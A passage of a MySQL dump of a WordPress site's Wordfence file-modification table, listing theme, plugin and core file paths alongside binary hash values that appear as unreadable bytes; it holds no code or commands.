����hk�\"OB���V��','',0,'?'),('�+�К��ԃ\r�I�','wp-content/themes/sg-window/inc/css/slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)m��N�&I(:b��','b�/���7��!�G���k\"���f`«\\','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�5�u�uȸ��8�P�Һ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���܊:����嵷Y','&��yZ��e��n��_���&���0�A �5','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*��~� �B�\r�$�','H�y��3�)��y)]0����bmoM���8SU�','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o-�~�|g��+2���','\'��)n�NOo��v�P4w��?��z>��֓!�','',0,'?'),('�P�\0�}B��!���Q6�','wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�TbU�;�!��>}���','c�vv(����L<7r�^�\n�Sa�Am*���','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�II�ٹ�$V��;�','p�K�-�׈�.,�ZT�!��:-[�������','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�c.��ދ���n��J��','wp-content/themes/nirvana/fonts/ubuntu-m-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Ce��Oh��\\�� �','�d&y?G��[&��E�9.� ���(�8L�','',0,'?'),('�e���h�SWb_ÉC�','wp-content/themes/hueman/assets/czr/css/img/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�f�x���/x�1','wp-content/themes/nirvana/includes/theme-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2q��҅�i�o\ZJ.�\0',',Բ��5�z�}��d\'��	dg=���/ز�K�*','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DQ�p7�\na�J�_�','�h�\n2Y2C0T��G�md�ѹU�Jg~�!�','',0,'?'),('�sXb��&A/��	�P','wp-content/themes/sg-window/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$y�Ԅ�;��@��6�','�-�\\=��\\@Y��ʉ��l���x�%��];','',0,'?'),('Š�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@F�U����L���','�+�.�b�d�A�8G�Ԭ8\Z.j��!OSn|e','',0,'?'),('¡Hﲒ�xT7D','wp-content/plugins/wordpress-seo/admin/class-option-tabs.php',0,'gg���M�\'˦	���M�','gg���M�\'˦	���M�','�#s�u�~\r+$�rc}f�׌()j��\Z����\0','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9쮨`Mah2�6&','ķ\nk%�g��}2\rM< �+��Gٹ�����5N','',0,'?'),('��:�r���7��','wp-content/themes/illdy/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�\\J*�[BA','�3]���m~=���*�G&^[�	�\"-^�w����','',0,'?'),('������g<bܜ�\\,','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-xml.php',0,'�\"JiG��s1;�U�g','�\"JiG��s1;�U�g','\\I ��G������&!�b��ꬾ��x','',0,'?'),('��`�.\r�t��\"�>�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�~��EgOEjYl��N','�NI#^�V��ʟ�h�W<�\\�k�DgR���','',0,'?'),('���˂�{5NK�?�GA','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-timezone.php',0,'���!0Y�2G���_','���!0Y�2G���_','�6�Ph��{���J�F�K��5ǒG�w��','',0,'?'),('�	1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('�Fsp.�]�`�M\'�','wp-content/themes/panoramic/library/images/quote.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�?�͠�2\n4��','\"��=W�ۍ5���6q&ӛ�J��U)s�ND','',0,'?'),('���\"b+�3W}��','wp-content/plugins/unyson/framework/extensions/update/includes/extends/class-fw-ext-update-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڤ�l?�\"yUk��!','�q�_��,�9���֚⾕��vU���P<Z�','',0,'?'),('��&㔹}.��ȳ��','wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�����F��o�z','�b?al,�h�ڌ�2#^8���G�9Y*!�9R{�','',0,'?'),('�S�yq�Br�l!�','wp-content/themes/fabulous-fluid/js/jquery.cycle/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�&N��j8Sp��T','/�k7�6L��$�ፖt�Y�-.f��=At͗@|�','',0,'?'),('�!z���A�ad{��','wp-content/themes/precious-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��apA;��L��[-<','��f5:\Z1�$�����Ŝ�l�;X�?e(B��\Z','',0,'?'),('�*i�O2�;%�{�;','wp-content/themes/vega/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��Ͽ�/Pu��','|kw�2�`�0��Ԣ!W�Z��E�\n�����q��','',0,'?'),('�;�է�[�����(f�','wp-content/plugins/wordpress-seo/admin/views/tabs/sitemaps/taxonomies.php',0,'DZ�n���!M�w��C','DZ�n���!M�w��C','w F�U6rSRph�l-S&�y�\0�p���t1','',0,'?'),('�E��e�\"^��zT��','wp-content/plugins/contact-form-7/modules/quiz.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0}ϳ�w\Z�\'��Ʃ','ɳ�\'u�\"ɘ�����\n���bv0�X�\\��U1','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�W��\'�&o�T�����','wp-content/themes/barletta/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('�\\�܌S�Kaf<�ڍ','wp-content/plugins/unyson/framework/extensions/social/manifest.php',0,'\\���8�}O���&w�','\\���8�}O���&w�','\r��f�kG�z6/W�$e���J�U�..�c)nܬ','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?');
INSERT INTO `wp_wffilemods` VALUES ('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('ã_�>\nJH�Q���','wp-content/themes/hueman/option-tree/includes/ot-functions-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JQ�ⷊ�	K��>]XL','\0��\r\'��5X�	G([�\'���[�s��%�','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�O���j�x0��','���\'�0n�.�D�[�8m=VǩT�vs�-','',0,'?'),('íQ��9r<=�T�\ZKE�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.az.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�L,~9��z�A9�԰','�|M��4�6�d�����Jm�b�*<��jd��','',0,'?'),('î)י�r�7�M܊<��','wp-content/themes/square/templates/home-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n\'�\'�b�f�D>A�','p���LШ�\05��&��wK�7*��6PAWv\0ߒ�','',0,'?'),('÷G>>cu���Ox��','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/class-fw-shortcodes-loader.php',0,'d��\"�9���RA�','d��\"�9���RA�','�t���|/6~N\\�\'\0=�! ���W2	S|\r��','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('��?�p#�:-��&�x�','wp-content/themes/tortuga/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3:��u&G��Ӿ(K','�\'JO��`9]O���@<\'�l�\Z�a�����}^','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���D����=^�%8�d','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt.js',0,'�4�:x�+�pl�\r��','�4�:x�+�pl�\r��','�9���a�#�����>V�f���UuW@��','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���<C�#�L��rg�','G�\rE�P2WS�qE�g��1(��kH�g2�18:','',0,'?'),('��4�l!�r��؄���','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��Am�E�f[�','sN�5�s��y�{׈�\'X�C�W�K�IOWa','',0,'?'),('��e��fz���eox��','wp-content/themes/twentytwentyone/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ī���j��kl�1','�S����Q-��9l7�7���W��`�]7n�齼�','',0,'?'),('���9ٲ�t�r�','wp-content/plugins/all-in-one-wp-migration/storage/index.php',0,'�A�-pޜ\r͈V�','�A�-pޜ\r͈V�','=���+��O���²���2E[�V�����OD','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 {����?��Y\0�','}T��A>�,�1�>\"5�b#���L��\r�9߬�O','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�YJ%H1*','��Q7�la�&��=�|�nY4..!��69�','',0,'?'),('��(h�E��gԟRu','wp-content/themes/hueman/assets/front/js/lib/requestAnimationFramePolyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��LV���z��VQ','F@��T5\'}%��\'��=��\n%zA����\n9','',0,'?'),('��*n�;A�LXI@�g','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ko.js',0,'{]t��hU�\0 ��&�','{]t��hU�\0 ��&�','_��cH�(�\n��[�YF�o�����x^�E�&�','',0,'?'),('�ň��/���tNҊb','wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�\n�a�7���:���','wp-content/themes/vega/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eӹ=���GU(�\r','���bO�}����+�\"��H�����9��W�','',0,'?'),('�\rPtquɪK!��5','wp-content/themes/vega/assets/js/vega-wp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','愥�\\��#�:��5_�','48|3���T	V�}�\r���9�q9O*\'ŀ��','',0,'?'),('�\ZtJ\\i2Wc�����!�','wp-content/themes/nirvana/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��e���	1�','\r������3}�?�w�u����1�Gg����','',0,'?'),('�&)����N~&����','wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����ّ^R�	','\Z��u�@�\'\\��KL�82�B��r�\Z2HC�o','',0,'?'),('�+�Z7K��Ft�G�m','wp-content/plugins/contact-form-7/languages/contact-form-7-ga.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̲-\\	�-���[�ze�',':�����V�P�])��rq�徍�L$�u�','',0,'?'),('�4�5�\0�Ω�on','wp-content/plugins/contact-form-7/languages/contact-form-7-ar.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5nokIp�2�v̈��','��9�D�j+����\\�\0],Wi�TI��Px','',0,'?'),('�;$r=l�ʤbg7��','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?4&��B��h','��9?����������������w	q���\n','',0,'?'),('�L9ԔL�MU�)�M��','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�`�s�B��`����','9�u�B��;4���pw�]~P�����i�y�U�','',0,'?'),('�[�ؽ�?��+��','wp-content/themes/verbosa/resources/fonts/icomoon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^(�)�X\'��i6z_�','�:Fb؛6�˯�����Dn1۵�T�B@d�','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('�k��\"�q<��ۻk','wp-content/themes/alpha-store/lib/cmb_extension/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��UO{�i6�Ӣ4','�h�}%�~um-�T�b��U7/������?�0','',0,'?'),('�m�$2G�l[pQ�!i+�','wp-content/plugins/spam-captcha/core/lang/SL_framework-ko_KR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�������_>	','?H�\n�\rfs���S3\"f�1|�6\n�,�c\\�Au','',0,'?'),('�~�A�\"6�WQɇ�@','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ae.php',0,'�;\0�Du���\r���io','�;\0�Du���\r���io','�&Om�kY�%��� ^|�8<uH��G�y�r/�l�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('Ĉ� h\0��&*��Y�_','wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���|�LQ ��1','{��o���lOr����WՊxy�Q�<�1�{��Q','',0,'?'),('ċ����C8Iki{P�','wp-content/plugins/unyson/framework/static/libs/typcn/fonts/typicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�c}���0��!�`.','�s��ּ���̪�{�jmG���va3_T��΋�','',0,'?'),('đ�ԪV�CT����G','wp-content/plugins/wordpress-seo/admin/pages/licenses.php',0,'��r���W��1?J�\nO','��r���W��1?J�\nO','�;��H�+I�����\0��Ex��#�z�D���','',0,'?'),('ĔԼ���pP�Z	H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('Ĕ��b5���(jE2\n','wp-content/plugins/unyson/framework/bootstrap-helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{\\���툨���','��Z��L@\r��}Ƞ</�Q.؜��','',0,'?'),('Ħ��SNL��h`���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"mb�\'u�̩��D�','9Z�Jn�l+;�CG;	�+�0s����f�8�','',0,'?'),('IJgc����VS9wp�','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/class-fw-ext-shortcodes-attr-coder-aggressive.php',0,'p[;L��p�M�:��k�','p[;L��p�M�:��k�','���\"�p\rJ���3d�Bg��)n�1�s�/��','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��1T�(Nȩ\Z','�7��NZ|�0�N��HQ��r�\nR��o�C�f','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('Ļ���,\rA|��H�\'s','wp-content/plugins/wordpress-seo/admin/ajax/class-recalculate-scores-ajax.php',0,'\n�9���`�=��4�A\'�','\n�9���`�=��4�A\'�','�۔������uJ���\0�����G��7��V2�','',0,'?'),('���ؑ\\���n`�͜','wp-content/themes/sg-window/inc/widget-project-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�ܸgn6�a��,','͙c	@9Z`�v�7�v��\\ز���4��','',0,'?'),('��#���k~	�Wi�\n�','wp-content/themes/relia/template-parts/content-event.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�o쁰K��?\\�:�','6ŭ�D�*���31��(]�nx�ʭH�>�d,5','',0,'?'),('��\r�RШ�<״U;\"','wp-content/plugins/contact-form-7/admin/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a{����ʕ�7','�4���hސG���?�N�;\n����{�s','',0,'?'),('���Ěz�̖x�&{cR','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-settings-fields.php',0,'4�=)B��`y��\n��7','4�=)B��`y��\n��7','��+�F|�,�.`�A\n�L�r~[]�-�t','',0,'?'),('��CT|�LS�Ϸ6��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/options.php',0,'vr=K��Ʒ�k��','vr=K��Ʒ�k��',':Dɜ������?��q� \Z�A�l�M�i','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('���e������H򙅋','wp-content/themes/lightly/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�2ƈ�]^���2.�I','�����\09��}fyt�(P�\r��H�����{ �','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('���1�@���C nB}','wp-content/themes/tortuga/inc/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�^�4|\'�N����','�\'�Й�_`rB����!c<��\n�1�P��=�k','',0,'?'),('��\r�E^[�7kg(��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/mk.js',0,'��iF�@+��D�#�I','��iF�@+��D�#�I','����G�N d�%�d~��P��%ŦaTw��','',0,'?'),('��2�y�0����y�','wp-content/themes/alpha-store/lib/welcome/img/maxstore.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q��j$/\"ָZ�8','K:�v�9��“K�$a2U�V�E��̴J��i','',0,'?'),('��r\Z9pT�8#`��','wp-content/themes/skt-construction-lite/images/slides/slider2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K������GW�����','�H�xb��m�\\j�B���A]AQ����<�+��','',0,'?'),('���oP�\rs��B�','wp-content/themes/travelify/library/functions/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��O��i%p�,��','�8���\'m�o��k�\r�IwL�\"����','',0,'?'),('��ׄ�����2m��=','wp-content/themes/nirvana/js/ajax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x���AҸ��^�.','��H-KjS˛4���o�r|�lz�Ȫ��p','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K׉�U�/&���7','(��_	�?݈:�գ:-�LK_\Z�:Y����','',0,'?'),('�u���I�q����0�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.tmagnic.php',0,'p�&=�8N����n�','p�&=�8N����n�','��}!6d�:��g�5GC\"���Pn��n�B','',0,'?'),('�\ZN��J��%7I','wp-content/themes/hueman/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�� �-�N>��O}C','�&;ɟEYL�@˪�\',����ia�=h�u','',0,'?'),('�)�h���A%�B3��v','wp-content/themes/the-minimal/images/file-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�-�Qʕ% ?�j���','\n>o�7�6H�y\0\Zw����n�m�)3\0���','',0,'?'),('�.#i1�K<��7͊���','wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-path-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A?m���r\n2Z��w=','po�|=��1�2�tF�5�c���)��z','',0,'?'),('�15���F�ys�oR','wp-content/themes/nirvana/styles/editor-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h@@0�l��Nh�','H��u�ǒu������H�\\�ӳ�������L','',0,'?'),('�3���]�\\�אh','wp-content/themes/nirvana/images/socials/Digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��jP_WYZ!��zo','iLPB��t�j캪޽��jA��ǖ��\Z.}n','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('�U�:=9X.d���O��]','wp-content/plugins/wordpress-seo/admin/onpage/class-onpage-option.php',0,'\\�*�ޠ�Q����d\0�','\\�*�ޠ�Q����d\0�','�j:V��#���W7�V�@���Y��gurc\0�','',0,'?'),('�V݀^�W�4��-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fq�ag�D���i\"','-u��|�5��CD`��磩QrG��)&�','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�w\rS�a��*��m��!','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-rss.php',0,'̇j����\\��E��\'','̇j����\\��E��\'','��5.��\'�K��P휤�L_>yC��U�ʯ�','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�Mn�6�E��pl��','u��v]�>�G��CeO���\r5��U�����','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �W�	r��>�Vݟ�','p�<L�>�������\r�~29~�^��ɋF�','',0,'?'),('Š�xҴt��o���$','wp-content/themes/sg-window/publication/page.php',0,'�m��l�v]�}87|�g','�m��l�v]�}87|�g','\'Ҡ�7]�jW��EGk�_�[�c_:�~�+\\x','',0,'?'),('�Õ㛷�ʍ�oP','wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.shuffle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΊK�%\Zl�Uc��Z','5��C����o����S���X���d���X','',0,'?'),('����j��`���A��','wp-content/themes/supernews/acmethemes/customizer/design-options/colors-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�,g����-�;�z!','���J��~xC��V	������m0ZZ�aI','',0,'?'),('���9�+e?�����','wp-content/themes/hueman/assets/admin/js/post-formats.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�yƦ���y�b�','�\r�_W>;O�l��=��]�����0Ҥ\0�7��','',0,'?'),('��C�ǝ\'��t��c��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.moniker.php',0,')�Z�,��9�eN�T',')�Z�,��9�eN�T','#�\\�po�O���U\"������=�ѓ&�:G�B','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('�΂v�0�r�m����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�UŽ�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e�	�','',0,'?'),('���)�f�í��v�o','wp-content/themes/nirvana/fonts/DroidSans-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WԹ�k�1`{�H€za','�%�b�-���X�x\"sj5�����~�=�7�ï','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?7t�|��$ѱ���','�B�S�ƚͷ�F�F-|�K0��n�+g�\\c��','',0,'?'),('��U{1�vŇٿ˪�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_input-groups.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑވ��Eb~��A�','�1�u��yR���<�[[�Ҵ��l�����\r|','',0,'?'),('�X2�oDz���f\0Z<z','wp-content/themes/hueman/assets/front/img/demo/logo/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��w�y�k%8��g_','��2d�l�0f�:_���K��`;꿼Q�','',0,'?'),('�	��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1	�?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�pԘ��Ҥ$r��P','wp-content/themes/fluida/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���?�\0���','x���iH��^���M�\0\'E�z�h�o�5�A','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� 